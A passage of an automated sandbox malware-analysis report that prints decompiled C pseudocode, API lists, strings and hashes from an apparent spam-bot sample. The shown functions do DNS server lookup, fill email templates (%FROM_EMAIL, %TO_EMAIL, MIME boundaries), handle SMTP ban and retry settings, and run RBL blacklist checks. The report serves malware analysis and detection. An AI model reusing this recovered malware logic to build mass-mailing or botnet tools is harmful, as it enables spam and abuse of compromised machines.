				if(_t18 == 0 || _t18 == 0xffffffff) {
					_t18 = LoadLibraryA(_t38);
				}
				if(_t18 == 0 || _t18 == 0xffffffff) {
					L18:
					return 0;
				} else {
					_t35 = GetProcAddress(_t18, "GetNetworkParams");
					if(_t35 == 0) {
						goto L18;
					}
					_t22 = HeapAlloc(GetProcessHeap(), 0, 0x4000);
					_t33 =  &_v16;
					_v8 = _t22;
					_v16 = 0x4000;
					_t23 =  *_t35(_t22,  &_v16);
					if(_t23 != 0) {
						goto L18;
					}
					_v12 = _v12 & _t23;
					_t37 = _v8 + 0x10c;
					if(_t37 == 0) {
						L17:
						HeapFree(GetProcessHeap(), 0, _v8);
						return _v12;
					} else {
						goto L8;
					}
					do {
						L8:
						_t40 = _t37 + 4;
						if(_t40 == 0) {
							goto L16;
						}
						_t27 = 2;
						_v32 = _t27;
						__imp__#9(0x35);
						_v30 = _t27;
						__imp__#11(_t40);
						_v28 = _t27;
						if(_t27 == 0 || _t27 == 0xffffffff) {
							__imp__#52(_t40);
							if(_t27 == 0) {
								goto L16;
							}
							_t27 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc))))));
							_v28 = _t27;
							goto L13;
						} else {
							L13:
							if(_t27 != 0 && _t27 != 0xffffffff) {
								_t31 = E00402CEB(_t33,  &_v32, _a4);
								_pop(_t33);
								_v12 = _t31;
								if(_t31 != 0) {
									goto L17;
								}
							}
						}
						L16:
						_t37 =  *_t37;
					} while (_t37 != 0);
					goto L17;
				}
			}

0x00402dfb
0x00402e01
0x00402e09
0x00402e11
0x00402e11
0x00402e19
0x00402ef1
0x00000000
0x00402e28
0x00402e34
0x00402e38
0x00000000
0x00000000
0x00402e4f
0x00402e55
0x00402e5a
0x00402e5d
0x00402e60
0x00402e64
0x00000000
0x00000000
0x00402e6d
0x00402e70
0x00402e76
0x00402ede
0x00402ee6
0x00000000
0x00000000
0x00000000
0x00000000
0x00402e78
0x00402e78
0x00402e78
0x00402e7d
0x00000000
0x00000000
0x00402e81
0x00402e84
0x00402e88
0x00402e8f
0x00402e93
0x00402e99
0x00402e9e
0x00402ea6
0x00402eae
0x00000000
0x00000000
0x00402eb5
0x00402eb7
0x00000000
0x00402eba
0x00402eba
0x00402ebc
0x00402eca
0x00402ed0
0x00402ed1
0x00402ed6
0x00000000
0x00000000
0x00402ed6
0x00402ebc
0x00402ed8
0x00402ed8
0x00402eda
0x00000000
0x00402e78

APIs

GetModuleHandleA.KERNEL32(iphlpapi.dll,73BCEA30,?,000DBBA0,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E01
LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E11
GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 00402E2E
GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4C
HeapAlloc.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4F
htons.WS2_32(00000035), ref: 00402E88
inet_addr.WS2_32(?), ref: 00402E93
gethostbyname.WS2_32(?), ref: 00402EA6
GetProcessHeap.KERNEL32(00000000,?,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE3
HeapFree.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE6

Strings

~s`ysps, xrefs: 00402E93
iphlpapi.dll, xrefs: 00402DFB, 00402E00, 00402E10
GetNetworkParams, xrefs: 00402E28

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
String ID: GetNetworkParams$iphlpapi.dll$~s`ysps
API String ID: 929413710-64764534
Opcode ID: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
Instruction ID: af9ac6d56ee620c8fffc4a8d4b95bbdbc136fdcf8554a1f3230d1ae4f4a52a91
Opcode Fuzzy Hash: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
Instruction Fuzzy Hash: E3318131A40209ABDB119BB8DD4CAAF7778AF04361F144136F914F72D0DBB8D9819B9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD89, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 121
timeCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040AD89(void* __ecx, void* __eflags) {
				signed int _t48;
				signed int _t50;
				void* _t53;
				intOrPtr _t55;
				void* _t76;
				signed int _t77;
				void* _t81;
				CHAR* _t92;
				void* _t94;
				void* _t96;
				void* _t98;

				_t76 = __ecx;
				_t94 = _t96 - 0x74;
				GetLocalTime(_t94 + 0x50);
				SystemTimeToFileTime(_t94 + 0x50, _t94 + 0x64);
				E0040EE2A(_t76, _t94 - 0x110, 0, 0x80);
				E0040AD08(_t94 - 0x110);
				_t98 = _t96 - 0x184 + 0x10;
				if(E004030B5() == 0) {
					 *((intOrPtr*)(_t94 + 0x6c)) = "127.0.0.1";
				} else {
					_push(_t94 - 0x90);
					 *((intOrPtr*)(_t94 + 0x6c)) = E0040A7A3(_t47, _t47);
				}
				_t48 = E0040ECA5();
				_t77 = 0xe;
				_t50 = E0040ECA5();
				_t92 = "%OUTLOOK_BND_";
				 *((intOrPtr*)(_t94 + 0x70)) = (_t50 & 0x00000001) + _t48 % _t77 + 0xb;
				_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				while(1) {
					_t103 = _t53;
					if(_t53 == 0) {
						break;
					}
					_t55 = E0040EDAC(_t53 + 0xd);
					_t81 =  *((intOrPtr*)(_t94 + 0x70)) + _t55;
					__eflags = _t81;
					 *((intOrPtr*)(_t94 + 0x60)) = _t55;
					wsprintfA(_t94 - 0x70, "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX", _t55, _t81,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64));
					wsprintfA(_t94 + 0x10, "%s%d", _t92,  *((intOrPtr*)(_t94 + 0x60)));
					E0040EF7C(__eflags,  *((intOrPtr*)(_t94 + 0x7c)), _t94 + 0x10, _t94 - 0x70, 0x3e800, 0);
					_t98 = _t98 + 0x40;
					_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				}
				wsprintfA(_t94 - 0x70, "%04x%08.8lx$%08.8lx$%08x@%s",  *((intOrPtr*)(_t94 + 0x70)) + 3,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64),  *((intOrPtr*)(_t94 + 0x6c)), _t94 - 0x110);
				E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_MID", _t94 - 0x70, 0x3e800, 0);
				return E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_HST", _t94 - 0x110, 0x3e800, 0);
			}

0x0040ad89
0x0040ad8a
0x0040ad98
0x0040ada6
0x0040adba
0x0040adc6
0x0040adcb
0x0040add5
0x0040adeb
0x0040add7
0x0040addd
0x0040ade6
0x0040ade6
0x0040adf5
0x0040adfe
0x0040ae03
0x0040ae0f
0x0040ae18
0x0040ae1b
0x0040ae7f
0x0040ae81
0x0040ae83
0x00000000
0x00000000
0x0040ae31
0x0040ae3f
0x0040ae3f
0x0040ae43
0x0040ae4f
0x0040ae5e
0x0040ae6e
0x0040ae73
0x0040ae7a
0x0040ae7a
0x0040aea5
0x0040aeb6
0x0040aedc

APIs

GetLocalTime.KERNEL32(?), ref: 0040AD98
SystemTimeToFileTime.KERNEL32(?,?), ref: 0040ADA6

Part of subcall function 0040AD08: gethostname.WS2_32(?,00000080), ref: 0040AD1C
Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD60
Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD69
Part of subcall function 0040AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F

Part of subcall function 004030B5: gethostname.WS2_32(?,00000080), ref: 004030D8
Part of subcall function 004030B5: gethostbyname.WS2_32(?), ref: 004030E2

wsprintfA.USER32 ref: 0040AEA5

Part of subcall function 0040A7A3: inet_ntoa.WS2_32(?), ref: 0040A7A9

wsprintfA.USER32 ref: 0040AE4F
wsprintfA.USER32 ref: 0040AE5E

Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0

Strings

127.0.0.1, xrefs: 0040ADEB
%04x%08.8lx$%08.8lx$%08x@%s, xrefs: 0040AE9F
----=_NextPart_%03d_%04X_%08.8lX.%08.8lX, xrefs: 0040AE49
%OUTLOOK_MID, xrefs: 0040AEAE
%OUTLOOK_BND_, xrefs: 0040AE0F, 0040AE14, 0040AE57, 0040AE76
%s%d, xrefs: 0040AE58
%OUTLOOK_HST, xrefs: 0040AEC5

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
API String ID: 3631595830-1816598006
Opcode ID: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
Instruction ID: 6edd35ca6b9ca9df7a5a601651cb978d50ba63929d11386258719776c0551fa5
Opcode Fuzzy Hash: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
Instruction Fuzzy Hash: 0C4123B290030CBBDF25EFA1DC45EEE3BADFF08304F14442BB915A2191E679E5548B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040F315, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 103networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(0040CA1D), ref: 0040F34D
socket.WS2_32(00000002,00000001,00000000), ref: 0040F367
closesocket.WS2_32(00000000), ref: 0040F375

Strings

ps, xrefs: 0040F375, 0040F3A0
time_cfg, xrefs: 0040F323

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: closesockethtonssocket
String ID: ps$time_cfg
API String ID: 311057483-1008165782
Opcode ID: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
Instruction ID: 30084693e0db7c5d018f03cf39b97fa82366a7d059792586ebb4172a1a3c68ff
Opcode Fuzzy Hash: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
Instruction Fuzzy Hash: AA319E72900118ABDB20DFA5DC859EF7BBCEF88314F104176F904E3190E7788A858BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE31, Relevance: 18.2, APIs: 6, Strings: 6, Instructions: 152
stringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040BE31(signed int _a4, intOrPtr _a8) {
				signed int _v8;
				CHAR* _v12;
				int _v16;
				int _t50;
				int _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				char* _t66;
				CHAR* _t68;
				int _t71;
				int _t72;
				void* _t76;
				intOrPtr _t78;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr* _t86;
				void* _t88;
				void* _t91;
				void* _t92;

				_t83 = _a4;
				_t68 = _t83 + 4;
				_v12 = _t68;
				if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
					L3:
					_t72 = 0;
					_v16 = 0;
					if(_a8 == 3) {
						L25:
						if(lstrcmpiA(_v12, "smtp_herr") != 0) {
							if(lstrcmpiA(_v12, "smtp_ban") != 0) {
								_t50 = lstrcmpiA(_v12, "smtp_retr");
								_t51 = 0x413638;
								if(_t50 != 0) {
									_t51 = _a4;
								}
							} else {
								_t51 = 0x413634;
							}
						} else {
							_t51 = 0x413630;
						}
						_t86 =  *_t51;
						 *_t51 = _v16;
						if(_t86 == 0) {
							goto L36;
						} else {
							_t52 =  *_t86;
							_t84 = 0;
							while(_t52 != 0) {
								E0040EC2E(_t52);
								_t84 = _t84 + 1;
								_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
							}
							return E0040EC2E(_t86);
						}
					}
					_t55 =  *((intOrPtr*)(_t83 + 0x18));
					_t82 = 0;
					if(_t55 <= 0) {
						goto L25;
					} else {
						goto L5;
					}
					do {
						L5:
						if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
							_t82 = _t82 + 1;
						}
						_t72 = _t72 + 1;
					} while (_t72 < _t55);
					if(_t82 == 0) {
						goto L25;
					}
					_t70 = 4 + _t82 * 4;
					_t51 = E0040EBCC(4 + _t82 * 4);
					_pop(_t76);
					_v16 = _t51;
					if(_t51 == 0) {
						goto L36;
					}
					E0040EE2A(_t76, _t51, 0, _t70);
					_t57 =  *((intOrPtr*)(_t83 + 0x18));
					_v8 = _v8 & 0x00000000;
					_a4 = _a4 & 0x00000000;
					_t92 = _t91 + 0xc;
					if(_t57 > 0) {
						_t71 = _v16;
						do {
							_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
							if(_t78 == 0xa || _a4 == _t57 - 1) {
								_t88 = _a4 - _v8;
								if(_t78 != 0xa) {
									_t88 = _t88 + 1;
								}
								_t25 = _t88 + 1; // 0x1
								_t59 = E0040EBCC(_t25);
								 *_t71 = _t59;
								if(_t59 == 0) {
									goto L25;
								} else {
									E0040EE08(_t59, _t83 + _v8 + 0x24, _t88);
									_t92 = _t92 + 0xc;
									 *((char*)(_t88 +  *_t71)) = 0;
									if(_t88 > 0) {
										_t31 =  *_t71 - 1; // -1
										_t66 = _t88 + _t31;
										if( *_t66 == 0xd) {
											 *_t66 = 0;
										}
									}
									_t71 = _t71 + 4;
									_v8 = _v8 + _t88 + 1;
									goto L22;
								}
							}
							L22:
							_a4 = _a4 + 1;
							_t57 =  *((intOrPtr*)(_t83 + 0x18));
						} while (_a4 < _t57);
					}
					goto L25;
				} else {
					_t51 = lstrcmpiA(_t68, "smtp_retr");
					if(_t51 != 0) {
						L36:
						return _t51;
					}
					goto L3;
				}
			}

0x0040be40
0x0040be43
0x0040be4c
0x0040be53
0x0040be71
0x0040be71
0x0040be77
0x0040be7a
0x0040bf62
0x0040bf6e
0x0040bf83
0x0040bf94
0x0040bf98
0x0040bf9d
0x0040bf9f
0x0040bf9f
0x0040bf85
0x0040bf85
0x0040bf85
0x0040bf70
0x0040bf70
0x0040bf70
0x0040bfa2
0x0040bfa7
0x0040bfab
0x00000000
0x0040bfad
0x0040bfad
0x0040bfaf
0x0040bfbe
0x0040bfb4
0x0040bfb9
0x0040bfba
0x0040bfbd
0x00000000
0x0040bfc8
0x0040bfab
0x0040be80
0x0040be83
0x0040be87
0x00000000
0x00000000
0x00000000
0x00000000
0x0040be8d
0x0040be8d
0x0040be92
0x0040be9b
0x0040be9b
0x0040be9c
0x0040be9d
0x0040bea3
0x00000000
0x00000000
0x0040bea9
0x0040beb1
0x0040beb6
0x0040beb7
0x0040bebc
0x00000000
0x00000000
0x0040bec6
0x0040becb
0x0040bece
0x0040bed2
0x0040bed6
0x0040bedb
0x0040bee1
0x0040bee4
0x0040bee7
0x0040beee
0x0040bef9
0x0040beff
0x0040bf01
0x0040bf01
0x0040bf02
0x0040bf06
0x0040bf0c
0x0040bf10
0x00000000
0x0040bf12
0x0040bf1c
0x0040bf23
0x0040bf26
0x0040bf2c
0x0040bf30
0x0040bf30
0x0040bf37
0x0040bf39
0x0040bf39
0x0040bf37
0x0040bf49
0x0040bf4c
0x00000000
0x0040bf4c
0x0040bf10
0x0040bf4f
0x0040bf4f
0x0040bf52
0x0040bf55
0x0040bf5a
0x00000000
0x0040be61
0x0040be67
0x0040be6b
0x0040bfcd
0x0040bfcd
0x0040bfcd
0x00000000
0x0040be6b

APIs

lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BE4F
lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BE5B
lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BE67
lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BF6A
lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BF7F
lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BF94

Strings

smtp_retr, xrefs: 0040BE61, 0040BF8C
86A, xrefs: 0040BF98
smtp_ban, xrefs: 0040BE55, 0040BF77
smtp_herr, xrefs: 0040BE46, 0040BF62
46A, xrefs: 0040BF85
06A, xrefs: 0040BF70

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: 06A$46A$86A$smtp_ban$smtp_herr$smtp_retr
API String ID: 1586166983-142018493
Opcode ID: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
Instruction ID: 5eb9e18a275db8e61a6fe50fd05ed02ec51c2bbb25542f34a2f5cec7b259a8e4
Opcode Fuzzy Hash: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
Instruction Fuzzy Hash: 98519F71A0021AEEDB119B65DD40B9ABBA9EF04344F14407BE845FB291D738E9818FDC

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3C5, Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040B3C5(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v132;
				void* _t46;
				char* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				E00405CE1(_a4, 0x3e800, _a16, 0, 0);
				E0040EF00( &_v132, "%FROM_EMAIL");
				E00405CE1( &_v132, 0x64, _a16, 0, 0);
				_t71 = E0040ED03( &_v132, 0x40);
				_t77 = _t76 + 0x38;
				_t83 = _t71;
				if(_t71 != 0) {
					_t7 = _t71 + 1; // 0x1
					E0040EF7C(_t83, _a4, "%FROM_DOMAIN", _t7, 0x3e800, 0);
					 *_t71 = 0;
					E0040EF7C(_t83, _a4, "%FROM_USER",  &_v132, 0x3e800, 0);
					_t77 = _t77 + 0x28;
				}
				_t72 = _a12;
				E0040EF7C(_t83, _a4, "%TO_DOMAIN",  *((intOrPtr*)(_t72 + 0xc)), 0x3e800, 0);
				wsprintfA( &_v132, "%s@%s",  *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
				E0040EF7C(_t83, _a4, "%TO_EMAIL",  &_v132, 0x3e800, 0);
				_t73 = _a4;
				E0040EF7C(_t83, _t73, "%TO_USER",  *((intOrPtr*)(_t72 + 4)), 0x3e800, 0);
				_t46 = E0040F0CB( &_v132);
				_push(0);
				_push( &_v132);
				_push(_t46);
				E0040F133();
				E0040EF7C(_t83, _t73, "%TO_HASH",  &_v132, 0x3e800, 0);
				_push(_t73);
				E0040AD89( &_v132, _t83);
				E0040B211(0,  &_v132, 0);
				E0040EF7C(_t83, _t73, "%DATE",  &_v132, 0x3e800, 0);
				E0040B211(0,  &_v132, 5);
				E0040EF7C(_t83, _t73, "%P5DATE",  &_v132, 0x3e800, 0);
				E0040B211(0,  &_v132, 0xfffffffb);
				E0040EF7C(_t83, _t73, "%M5DATE",  &_v132, 0x3e800, 0);
				_t75 = _a8;
				 *((char*)(E0040AEDD(_t75, _t73, 0x3e800) + _t75)) = 0;
				return _t75;
			}

0x0040b3e1
0x0040b3ef
0x0040b3ff
0x0040b40f
0x0040b411
0x0040b414
0x0040b416
0x0040b41a
0x0040b426
0x0040b439
0x0040b43b
0x0040b440
0x0040b440
0x0040b443
0x0040b453
0x0040b467
0x0040b47b
0x0040b485
0x0040b48e
0x0040b49a
0x0040b49f
0x0040b4a3
0x0040b4a4
0x0040b4a5
0x0040b4b6
0x0040b4bb
0x0040b4bc
0x0040b4c7
0x0040b4d8
0x0040b4e7
0x0040b4f8
0x0040b504
0x0040b515
0x0040b51e
0x0040b52b
0x0040b534

APIs

wsprintfA.USER32 ref: 0040B467

Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0

Strings

%P5DATE, xrefs: 0040B4F2
%s@%s, xrefs: 0040B461
%FROM_USER, xrefs: 0040B431
%FROM_EMAIL, xrefs: 0040B3E9
%TO_USER, xrefs: 0040B488
%FROM_DOMAIN, xrefs: 0040B41E
%M5DATE, xrefs: 0040B50F
%TO_DOMAIN, xrefs: 0040B44B
%DATE, xrefs: 0040B4D2
%TO_HASH, xrefs: 0040B4B0
%TO_EMAIL, xrefs: 0040B473

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: lstrlen$wsprintf
String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
API String ID: 1220175532-2340906255
Opcode ID: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
Instruction ID: bf34ba3998127a8345ca8177a6a798a4e2b1dcf0281bd89f40bace4b7f612c60
Opcode Fuzzy Hash: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
Instruction Fuzzy Hash: CE4174B254011D7EDF016B96CCC2DFFBB6CEF4934CB14052AF904B2181EB78A96487A9

Uniqueness

Uniqueness Score: -1.00%

Function 00402011, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00402011() {
				long _t35;
				void* _t45;
				intOrPtr _t47;
				void* _t51;
				char* _t53;
				char* _t58;
				intOrPtr _t96;
				signed int _t102;
				signed int _t103;
				void* _t104;
				void* _t122;

				if(( *0x4122f4 & 0x00000001) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000001;
					 *0x4122f0 = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000002) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000002;
					 *0x4122ec = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000004) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000004;
					 *0x4122e8 = E0040F04E(0);
				}
				_t35 = GetTickCount();
				_t96 =  *((intOrPtr*)(_t104 + 0x114));
				if(_t35 -  *0x4122e0 > 0xdbba0) {
					_t58 =  *0x412000; // 0x410288
					_t103 = 0;
					if( *_t58 != 0) {
						_t60 = 0x412000;
						do {
							if(E00402684( *_t60) == 0) {
								goto L11;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004;
								if(E00401978(_t61, 0x50) != 0) {
									_t12 = _t96 + 0x14;
									 *_t12 =  *(_t96 + 0x14) | 0x00000002;
									__eflags =  *_t12;
								} else {
									goto L11;
								}
							}
							goto L14;
							L11:
							_t103 = _t103 + 1;
							_t60 = 0x412000 + _t103 * 4;
						} while ( *((char*)( *(0x412000 + _t103 * 4))) != 0);
					}
					L14:
					 *0x4122e0 = GetTickCount();
				}
				if(GetTickCount() -  *0x4122dc > 0xdbba0) {
					_t53 =  *0x412000; // 0x410288
					_t102 = 0;
					if( *_t53 != 0) {
						_t55 = 0x412000;
						do {
							if(E00402EF8( *_t55) == 0) {
								goto L20;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008;
								if(E00401978(_t56, 0x19) != 0) {
									_t18 = _t96 + 0x14;
									 *_t18 =  *(_t96 + 0x14) | 0x00000001;
									__eflags =  *_t18;
								} else {
									goto L20;
								}
							}
							goto L23;
							L20:
							_t102 = _t102 + 1;
							_t55 = 0x412000 + _t102 * 4;
						} while ( *((char*)( *(0x412000 + _t102 * 4))) != 0);
					}
					L23:
					 *0x4122dc = GetTickCount();
				}
				 *(_t96 + 0x28) = GetTickCount() / 0x3e8;
				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x412110;
				_t45 = E0040F04E(0) -  *0x4122f0;
				_t93 = "localcfg";
				_t122 = _t45 -  *0x4122e4; // 0x0
				if(_t122 > 0) {
					E0040E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x410264);
					_t51 = E0040E819(1, _t93, "rbl_ip", 0);
					_t104 = _t104 + 0x28;
					if(_t51 == 0) {
						L28:
						 *0x4122e4 = 0x12c;
					} else {
						_t124 =  *((intOrPtr*)(_t104 + 0x10));
						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
							goto L28;
						} else {
							_push(_t104 + 0x10);
							_push(_t51);
							 *((intOrPtr*)(_t96 + 0x38)) = E00401C5F(_t124);
							 *0x4122e4 = 0x4b0;
						}
					}
				}
				_t47 = E0040F04E(0) -  *0x4122f0;
				if(_t47 > 0x4b0) {
					E0040EA84(1, _t93, "net_type",  *(_t96 + 0x14));
					_t47 = E0040F04E(0);
					 *0x4122f0 = _t47;
				}
				return _t47;
			}

0x0040201e
0x00402020
0x0040202f
0x0040202f
0x0040203b
0x0040203d
0x0040204c
0x0040204c
0x00402058
0x0040205a
0x00402069
0x00402069
0x00402078
0x00402080
0x0040208e
0x00402090
0x00402095
0x0040209a
0x0040209c
0x004020a1
0x004020ab
0x00000000
0x004020ad
0x004020ad
0x004020bd
0x004020d0
0x004020d0
0x004020d0
0x00000000
0x00000000
0x00000000
0x004020bd
0x00000000
0x004020bf
0x004020bf
0x004020c0
0x004020c9
0x004020ce
0x004020d4
0x004020d6
0x004020d6
0x004020e5
0x004020e7
0x004020ec
0x004020f1
0x004020f3
0x004020f8
0x00402102
0x00000000
0x00402104
0x00402104
0x00402114
0x00402127
0x00402127
0x00402127
0x00000000
0x00000000
0x00000000
0x00402114
0x00000000
0x00402116
0x00402116
0x00402117
0x00402120
0x00402125
0x0040212b
0x0040212d
0x0040212d
0x0040213f
0x00402151
0x00402159
0x00402160
0x0040216a
0x00402170
0x00402189
0x00402197
0x0040219c
0x004021a1
0x004021c1
0x004021c1
0x004021a3
0x004021a3
0x004021a7
0x00000000
0x004021a9
0x004021ad
0x004021ae
0x004021b6
0x004021b9
0x004021b9
0x004021a7
0x004021a1
0x004021d1
0x004021da
0x004021e7
0x004021ed
0x004021f5
0x004021f5
0x00402204

APIs

GetTickCount.KERNEL32 ref: 00402078
GetTickCount.KERNEL32 ref: 004020D4
GetTickCount.KERNEL32 ref: 004020DB
GetTickCount.KERNEL32 ref: 0040212B
GetTickCount.KERNEL32 ref: 00402132
GetTickCount.KERNEL32 ref: 00402142

Part of subcall function 0040F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0040E342,00000000,73AFF210,80000001,00000000,0040E513,?,?,?,?,000000E4), ref: 0040F089
Part of subcall function 0040F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0040E342,00000000,73AFF210,80000001,00000000,0040E513,?,?,?,?,000000E4,000000C8), ref: 0040F093

Part of subcall function 0040E854: lstrcpyA.KERNEL32(00000001,?,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E88B
Part of subcall function 0040E854: lstrlenA.KERNEL32(00000001,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E899

Part of subcall function 00401C5F: wsprintfA.USER32 ref: 00401CE1

Strings

rbl_ip, xrefs: 0040218F
rbl_bl, xrefs: 00402181
localcfg, xrefs: 00402070, 00402160, 00402186, 00402194, 004021E4
net_type, xrefs: 004021DF

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
String ID: localcfg$net_type$rbl_bl$rbl_ip
API String ID: 3976553417-1522128867
Opcode ID: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
Instruction ID: 2c4ade229706ff5e66d1d9a19171a9bb61e55472092035c31cb102c4d2320628
